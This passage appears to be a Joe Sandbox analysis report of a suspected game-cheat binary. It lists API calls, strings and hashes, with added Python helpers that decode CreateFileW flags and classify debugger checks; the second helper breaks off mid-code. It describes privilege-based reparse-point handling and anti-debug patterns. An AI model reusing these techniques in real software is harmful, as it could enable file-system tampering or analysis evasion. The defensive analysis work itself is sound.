                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 43dfa00522e52208c4d1e31f5f9684ec83d305905d53418d7ff8b9db8c77bb66
                                                    • Instruction ID: 087597623c9d2237848f6eba2763de79aeeb07329cecea36a5d64f59db82e663
                                                    • Opcode Fuzzy Hash: 43dfa00522e52208c4d1e31f5f9684ec83d305905d53418d7ff8b9db8c77bb66
                                                    • Instruction Fuzzy Hash: 17A011C22A8802BCB00822002C0AE3F030EC0CAF2A330AC2EF80AC00C0A8800C0808B0
                                                    APIs
                                                    • SetEndOfFile.KERNELBASE(?,00CF903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00CF9F0C
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: File
                                                    • String ID:
                                                    • API String ID: 749574446-0
                                                    • Opcode ID: c9a08f3dcb7854972c8c9fb59fae973129b796323317798060c2b04a4b9e1b92
                                                    • Instruction ID: 48e7f61ea0822abbdc88ed89506cedb96a7aa5f7fb1c83732ca79923657822b1
                                                    • Opcode Fuzzy Hash: c9a08f3dcb7854972c8c9fb59fae973129b796323317798060c2b04a4b9e1b92
                                                    • Instruction Fuzzy Hash: 6DA0113008020A8A8E202B30CA08A0C3B20FB20BC030002A8A00ACA0A2CB2A880B8A20
                                                    APIs
                                                    • SetCurrentDirectoryW.KERNELBASE(?,00D0AE72,C:\Users\user\Desktop,00000000,00D3946A,00000006), ref: 00D0AC08
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory
                                                    • String ID:
                                                    • API String ID: 1611563598-0
                                                    • Opcode ID: 1607835a084c0988f3e1100861c10a8036382bd5629b19b5fe3bb82b3b3effe3
                                                    • Instruction ID: c06bd5da4eea1e3fb3ef7e62bd2d684373401b9eff5687ed3557c23d826244b1
                                                    • Opcode Fuzzy Hash: 1607835a084c0988f3e1100861c10a8036382bd5629b19b5fe3bb82b3b3effe3
                                                    • Instruction Fuzzy Hash: D9A011302003008B82020B328F0AA0EBAAAAFA2B00F00C028A000C0230CB38C8B0AA20
                                                    APIs
                                                    • CloseHandle.KERNELBASE(000000FF,?,?,00CF95D6,?,?,?,?,?,00D22641,000000FF), ref: 00CF963B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: 927a8f6334af006e4b5b8a4d9ff696c806b0805c5cdf1b4b7cb3edce4129d2b6
                                                    • Instruction ID: 8c2366c963e9f76cf337a1ae6c777f6cc4b185676f2b6c996b19d12d1a496f89
                                                    • Opcode Fuzzy Hash: 927a8f6334af006e4b5b8a4d9ff696c806b0805c5cdf1b4b7cb3edce4129d2b6
                                                    • Instruction Fuzzy Hash: 8CF0E930081B099FDFB08A24C4487A277F8EB12321F140B1EE2F2829E0D370668D9A51
                                                    APIs
                                                      • Part of subcall function 00CF1316: GetDlgItem.USER32(00000000,00003021), ref: 00CF135A
                                                      • Part of subcall function 00CF1316: SetWindowTextW.USER32(00000000,00D235F4), ref: 00CF1370
                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00D0C2B1
                                                    • EndDialog.USER32(?,00000006), ref: 00D0C2C4
                                                    • GetDlgItem.USER32(?,0000006C), ref: 00D0C2E0
                                                    • SetFocus.USER32(00000000), ref: 00D0C2E7
                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 00D0C321
                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00D0C358
                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00D0C36E
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00D0C38C
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D0C39C
                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D0C3B8
                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D0C3D4
                                                    • _swprintf.LIBCMT ref: 00D0C404
                                                      • Part of subcall function 00CF4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF40A5
                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00D0C417
                                                    • FindClose.KERNEL32(00000000), ref: 00D0C41E
                                                    • _swprintf.LIBCMT ref: 00D0C477
                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 00D0C48A
                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00D0C4A7
                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00D0C4C7
                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00D0C4D7
                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00D0C4F1
                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00D0C509
                                                    • _swprintf.LIBCMT ref: 00D0C535
                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00D0C548
                                                    • _swprintf.LIBCMT ref: 00D0C59C
                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 00D0C5AF
                                                      • Part of subcall function 00D0AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00D0AF35
                                                      • Part of subcall function 00D0AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00D2E72C,?,?), ref: 00D0AF84
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                    • API String ID: 797121971-1840816070
                                                    • Opcode ID: b67e295caacd1e5135b5eaee3d21a21bcebccf27fd095345a74e7e93c7be7023
                                                    • Instruction ID: 573bbcfba44687935ede7e4477465a91ffd9bdc27d3b74fd348729c6a1663cb1
                                                    • Opcode Fuzzy Hash: b67e295caacd1e5135b5eaee3d21a21bcebccf27fd095345a74e7e93c7be7023
                                                    • Instruction Fuzzy Hash: D3919172648348BBE2319BB0DD49FFB77ACEB4A740F044919B789D21C1D775AA048B72
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF6FAA
                                                    • _wcslen.LIBCMT ref: 00CF7013
                                                    • _wcslen.LIBCMT ref: 00CF7084
                                                      • Part of subcall function 00CF7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CF7AAB
                                                      • Part of subcall function 00CF7A9C: GetLastError.KERNEL32 ref: 00CF7AF1
                                                      • Part of subcall function 00CF7A9C: CloseHandle.KERNEL32(?), ref: 00CF7B00
                                                      • Part of subcall function 00CFA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00CF977F,?,?,00CF95CF,?,?,?,?,?,00D22641,000000FF), ref: 00CFA1F1
                                                      • Part of subcall function 00CFA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CF977F,?,?,00CF95CF,?,?,?,?,?,00D22641), ref: 00CFA21F
                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00CF7139
                                                    • CloseHandle.KERNEL32(00000000), ref: 00CF7155
                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00CF7298
                                                      • Part of subcall function 00CF9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CF73BC,?,?,?,00000000), ref: 00CF9DBC
                                                      • Part of subcall function 00CF9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00CF9E70
                                                      • Part of subcall function 00CF9620: CloseHandle.KERNELBASE(000000FF,?,?,00CF95D6,?,?,?,?,?,00D22641,000000FF), ref: 00CF963B
                                                      • Part of subcall function 00CFA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CFA325,?,?,?,00CFA175,?,00000001,00000000,?,?), ref: 00CFA501
                                                      • Part of subcall function 00CFA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CFA325,?,?,?,00CFA175,?,00000001,00000000,?,?), ref: 00CFA532
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                    • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                    • API String ID: 3983180755-3508440684
                                                    • Opcode ID: f886815440082bbe122681a96e772b1a6c9093aa31fe8b3e97407c8009b6fba9
                                                    • Instruction ID: ad45a2b4ec5f88721200b2416d6a11177877e24beae07d5dad56b75243cfae4a
                                                    • Opcode Fuzzy Hash: f886815440082bbe122681a96e772b1a6c9093aa31fe8b3e97407c8009b6fba9
                                                    • Instruction Fuzzy Hash: 52C1D871904209AADB65DB74DC41FFEB7A8EF04300F004659FA5AE3281D734AB489B72
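The two CreateFileW calls in this entry (refs 00CF7139 and 00CF7298) only become a statement about behaviour once their hex arguments are decoded, so here is a small decoder, added as an example and not part of the Joe Sandbox report or of the sample. It expands dwDesiredAccess, dwShareMode, dwCreationDisposition and dwFlagsAndAttributes against the winnt.h/winbase.h constants: the first call creates a new file (GENERIC_WRITE, CREATE_NEW, FILE_ATTRIBUTE_NORMAL) and is followed by CloseHandle; the second opens an existing path read/write with FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, which addresses a reparse point itself rather than its target and, when SeRestorePrivilege is enabled, lets the open bypass the object's ACL. Read together with this function's string list (SeRestorePrivilege, SeCreateSymbolicLinkPrivilege, `\??\`, `UNC\`), that is the handle pattern of code that creates or rewrites symlinks or junctions while extracting files; whether a reparse buffer is actually written is decided by a DeviceIoControl that this entry does not show, so treat the flag match as a lead to confirm in the disassembly. The trace-line format assumed is the one printed on this page, with `?` marking arguments the sandbox could not resolve.

```python
"""Decode CreateFileW arguments from Joe Sandbox API trace lines.

Added example, not part of the report or the sample. The line format assumed
is the one printed on this page: "CreateFileW.KERNEL32(a1,a2,...), ref: ADDR",
where '?' marks an argument the sandbox could not resolve.
"""
import re

# dwDesiredAccess generic rights (winnt.h)
GENERIC_RIGHTS = {
    0x80000000: "GENERIC_READ",
    0x40000000: "GENERIC_WRITE",
    0x20000000: "GENERIC_EXECUTE",
    0x10000000: "GENERIC_ALL",
}
# dwShareMode; an empty result means the file is opened for exclusive access
SHARE_MODES = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
# dwCreationDisposition
DISPOSITIONS = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
# dwFlagsAndAttributes: FILE_FLAG_* in the high bits, FILE_ATTRIBUTE_* in the low bits
FLAGS_AND_ATTRIBUTES = {
    0x80000000: "FILE_FLAG_WRITE_THROUGH",
    0x40000000: "FILE_FLAG_OVERLAPPED",
    0x20000000: "FILE_FLAG_NO_BUFFERING",
    0x10000000: "FILE_FLAG_RANDOM_ACCESS",
    0x08000000: "FILE_FLAG_SEQUENTIAL_SCAN",
    0x04000000: "FILE_FLAG_DELETE_ON_CLOSE",
    0x02000000: "FILE_FLAG_BACKUP_SEMANTICS",
    0x01000000: "FILE_FLAG_POSIX_SEMANTICS",
    0x00200000: "FILE_FLAG_OPEN_REPARSE_POINT",
    0x00100000: "FILE_FLAG_OPEN_NO_RECALL",
    0x00004000: "FILE_ATTRIBUTE_ENCRYPTED",
    0x00000800: "FILE_ATTRIBUTE_COMPRESSED",
    0x00000400: "FILE_ATTRIBUTE_REPARSE_POINT",
    0x00000100: "FILE_ATTRIBUTE_TEMPORARY",
    0x00000080: "FILE_ATTRIBUTE_NORMAL",
    0x00000020: "FILE_ATTRIBUTE_ARCHIVE",
    0x00000010: "FILE_ATTRIBUTE_DIRECTORY",
    0x00000004: "FILE_ATTRIBUTE_SYSTEM",
    0x00000002: "FILE_ATTRIBUTE_HIDDEN",
    0x00000001: "FILE_ATTRIBUTE_READONLY",
}

TRACE_LINE = re.compile(r"(?P<api>\w+)\.(?P<module>[A-Z0-9_]+)\((?P<args>[^)]*)\)")


def _names(value, table):
    """Expand a bitmask into sorted constant names; unknown bits are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(f"0x{leftover:08X}")
    return sorted(names)


def decode_createfile_line(line):
    """Decode dwDesiredAccess, dwShareMode, dwCreationDisposition and
    dwFlagsAndAttributes (argument positions 1, 2, 4, 5) of a CreateFileW line.

    The sandbox may print more words than the API takes (stack residue after
    the real arguments), so only the first seven positions are looked at.
    """
    m = TRACE_LINE.search(line)
    if not m or m.group("api") != "CreateFileW":
        raise ValueError("not a CreateFileW trace line")
    words = [w.strip() for w in m.group("args").split(",")]
    if len(words) < 7:
        raise ValueError("CreateFileW takes seven arguments")

    def word(i):
        return None if words[i] == "?" else int(words[i], 16)

    access, share, disposition, flags = word(1), word(2), word(4), word(5)
    return {
        "access": ["?"] if access is None else _names(access, GENERIC_RIGHTS),
        "share": ["?"] if share is None else _names(share, SHARE_MODES),
        "disposition": "?" if disposition is None else DISPOSITIONS.get(disposition, f"0x{disposition:X}"),
        "flags": ["?"] if flags is None else _names(flags, FLAGS_AND_ATTRIBUTES),
    }


def is_reparse_point_write_open(decoded):
    """True when the handle can write to a reparse point itself rather than to
    its target: GENERIC_WRITE together with FILE_FLAG_OPEN_REPARSE_POINT and
    FILE_FLAG_BACKUP_SEMANTICS. Read-only opens with OPEN_REPARSE_POINT are how
    backup tools and directory walkers avoid following links, so the write
    right is what makes the combination worth a closer look."""
    return ("GENERIC_WRITE" in decoded["access"]
            and "FILE_FLAG_OPEN_REPARSE_POINT" in decoded["flags"]
            and "FILE_FLAG_BACKUP_SEMANTICS" in decoded["flags"])


# The two CreateFileW lines of this function entry, copied from the report.
CREATE_NEW_LINE = "CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00CF7139"
REPARSE_OPEN_LINE = "CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00CF7298"

if __name__ == "__main__":
    for line in (CREATE_NEW_LINE, REPARSE_OPEN_LINE):
        d = decode_createfile_line(line)
        tag = "reparse-point write open" if is_reparse_point_write_open(d) else ""
        print(line.split(", ref: ")[1], d, tag)
```

The decoder keeps unknown bits as hex rather than dropping them, so a flag it does not know about (FILE_FLAG_SESSION_AWARE, for instance) still shows up in the output instead of silently disappearing.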
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: __floor_pentium4
                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                    • API String ID: 4168288129-2761157908
                                                    • Opcode ID: 59d40f4c916946154acd0981d218be71cdbf96026cea81c93422aa2c1243e5f3
                                                    • Instruction ID: 49f2f82c6f900a22a07f79fbcff2cfdbae97e563bf5a3019253503824066325e
                                                    • Opcode Fuzzy Hash: 59d40f4c916946154acd0981d218be71cdbf96026cea81c93422aa2c1243e5f3
                                                    • Instruction Fuzzy Hash: 26C22B71E086289FDB25CE28ED407E9B7B5EB44305F1941EAD84DE7241EB74AEC18F60
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: H_prolog_swprintf
                                                    • String ID: CMT$h%u$hc%u
                                                    • API String ID: 146138363-3282847064
                                                    • Opcode ID: 6ea5bd27be7c4901f72837205c41fe618008749038511e15378fa17b70583fa7
                                                    • Instruction ID: bbe9fd770e4afef962404612194b1d53d99bde2af8c8146056ff3ab14bd1aed6
                                                    • Opcode Fuzzy Hash: 6ea5bd27be7c4901f72837205c41fe618008749038511e15378fa17b70583fa7
                                                    • Instruction Fuzzy Hash: 6D32C57161028CAFDF58DF74C895AF93BA5AF14300F04047DFE9A8B282DB749649CB22
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CF2874
                                                    • _strlen.LIBCMT ref: 00CF2E3F
                                                      • Part of subcall function 00D002BA: __EH_prolog.LIBCMT ref: 00D002BF
                                                      • Part of subcall function 00D01B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CFBAE9,00000000,?,?,?,000103DE), ref: 00D01BA0
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CF2F91
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                    • String ID: CMT
                                                    • API String ID: 1206968400-2756464174
                                                    • Opcode ID: 298449f2003846b2ece95ca19a01edeb9e25ae730fc2ac26d863cdf6a0c3dc54
                                                    • Instruction ID: f1325ccb5aee704ca8466af2cb2c8dc3dad17a2e8a1dc7a1d83afc2297d1bef1
                                                    • Opcode Fuzzy Hash: 298449f2003846b2ece95ca19a01edeb9e25ae730fc2ac26d863cdf6a0c3dc54
                                                    • Instruction Fuzzy Hash: E7624B716002899FDB59DF34C8857FA37A1EF54300F08447EEEAA8B382DB759A45CB61
                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D0F844
                                                    • IsDebuggerPresent.KERNEL32 ref: 00D0F910
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D0F930
                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00D0F93A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                     • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                    • String ID:
                                                    • API String ID: 254469556-0
                                                    • Opcode ID: a6aed74fb86abbf80201d1d990503aacd216e9d70ec3ae5ad003e59bcb15318a
                                                    • Instruction ID: 8d69fd5107765838bd3b0451dbb8e55793edea30875ddb7545b3542b722743e8
                                                    • Opcode Fuzzy Hash: a6aed74fb86abbf80201d1d990503aacd216e9d70ec3ae5ad003e59bcb15318a
                                                    • Instruction Fuzzy Hash: 23312B75D053199BDB21DFA4D9897CCBBB8AF04304F1040AAE40CA7290EB759B858F65
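The four calls in this entry (IsProcessorFeaturePresent(00000017), IsDebuggerPresent, SetUnhandledExceptionFilter(00000000), UnhandledExceptionFilter) have the shape of the MSVC CRT's fatal-error reporting path: feature 0x17 is PF_FASTFAIL_AVAILABLE, which the /GS stack-cookie failure handler probes before it falls back to clearing the unhandled-exception filter and handing the process to Windows Error Reporting. That code runs only after a cookie mismatch, so an IsDebuggerPresent in this position is CRT boilerplate rather than the evasion check a generic "checks for a debugger" signature might suggest; the same IsDebuggerPresent / SetUnhandledExceptionFilter(00000000) pair recurs at 00D18FB5/00D18FBF further down. The following Python, added here and not part of the report or the sample, parses API lines in this page's format and labels each IsDebuggerPresent call either as reporter boilerplate or as a standalone check worth opening in the disassembler. The first sample is the API list copied from this entry; the ExitProcess contrast is constructed for the example.

```python
"""Label IsDebuggerPresent calls in a Joe Sandbox per-function API list.

Added example, not part of the report. The line format assumed is the one
printed on this page: "Name.MODULE(arg,...), ref: ADDR" (argument list optional).
"""
import re

TRACE_LINE = re.compile(
    r"(?P<api>[\w$@?]+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

PF_FASTFAIL_AVAILABLE = "00000017"  # IsProcessorFeaturePresent(23), as the trace prints it


def parse_api_list(text):
    """Return the calls of one function entry, in trace order."""
    calls = []
    for line in text.splitlines():
        m = TRACE_LINE.search(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append({"api": m.group("api"), "args": args, "ref": int(m.group("ref"), 16)})
    return calls


def classify_debugger_checks(calls):
    """One verdict per IsDebuggerPresent call in the list.

    'crt_fatal_error_reporter': the very next call is SetUnhandledExceptionFilter(NULL).
        Asking about the debugger and then clearing the filter is what the MSVC
        CRT does in its /GS cookie-failure and invalid-parameter reporters before
        invoking UnhandledExceptionFilter. gs_probe is True when
        IsProcessorFeaturePresent(PF_FASTFAIL_AVAILABLE) appears earlier in the
        same entry, which pins the code to the /GS failure handler.
    'standalone': any other context; the return value may steer control flow.
    """
    verdicts = []
    for i, call in enumerate(calls):
        if call["api"] != "IsDebuggerPresent":
            continue
        nxt = calls[i + 1] if i + 1 < len(calls) else None
        clears_filter = (
            nxt is not None
            and nxt["api"] == "SetUnhandledExceptionFilter"
            and nxt["args"][:1] == ["00000000"]
        )
        gs_probe = any(
            c["api"] == "IsProcessorFeaturePresent" and c["args"][:1] == [PF_FASTFAIL_AVAILABLE]
            for c in calls[:i]
        )
        verdicts.append({
            "ref": call["ref"],
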